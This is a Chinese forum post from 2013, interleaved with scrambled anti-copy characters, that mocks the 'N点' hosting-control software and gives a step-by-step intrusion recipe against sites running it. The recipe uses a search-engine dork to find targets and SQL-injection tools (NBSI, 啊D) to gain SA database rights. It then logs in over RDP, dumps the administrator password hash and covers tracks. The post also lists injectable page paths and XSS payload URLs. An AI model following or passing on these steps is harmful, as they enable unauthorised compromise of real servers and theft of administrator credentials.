不得不说N点实在是一个破东西
) x; h/ j9 W8 T就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂
; p. V/ N; [; g v# _好吧 抱怨一下就行了 接下来关键的时候到了
6 ~: C3 O: M7 U+ \首先百度搜索关键字:inurl: (mmdatabase.asp)6 R# i3 S2 d- a
我随便列举一个: www.xxxx.com
2 n( L4 u6 f# Z8 v% ~修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1. D! ?: s* a$ c r) Q5 F& x
扔入NBSI 或者啊D等各种傻逼工具后0 P8 I7 y, b: G6 ~, \/ s4 {
你们会看到是SA权限: y/ J0 |$ G V; w
果断3389 上去 hash得到administrator密码
. l# S) v: A7 H6 u9 r g擦屁股走人~5 ~* I, y" n+ E" ^( p
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
8 P4 B5 O% a) \/ R 2 q' g0 j2 \$ G7 u4 ~$ ~
再附上其他几个漏洞页面) M* [3 V3 ?& g) w4 G1 V& Z
SQL:7 c* s: P9 m( S. C( B
http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1
: C# z1 @5 ^* N. ~http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11
, T9 q- o/ Q2 q2 Vhttp://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9+ |+ }' A5 M7 n; V$ m$ E
http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
. S/ h7 z" i# w9 w! @XSS证明:
$ k/ \9 v# C7 y0 m9 shttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
" m6 {6 p' |' x- rhttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
3 U4 z5 n9 W J, s9 g) L' nhttp://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script> ?! c9 }$ t) F
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜0 `. h0 c" W7 i6 P& T$ K3 i
还是星外吧 你们懂的
3 O% o1 d2 H( O作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?1 z8 Y! @* h6 D# P# r+ e h7 U
PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉
) j4 u8 d& V2 a8 r4 D8 M——- |
发表于 2013-3-3 08:06:44
收藏
支持
反对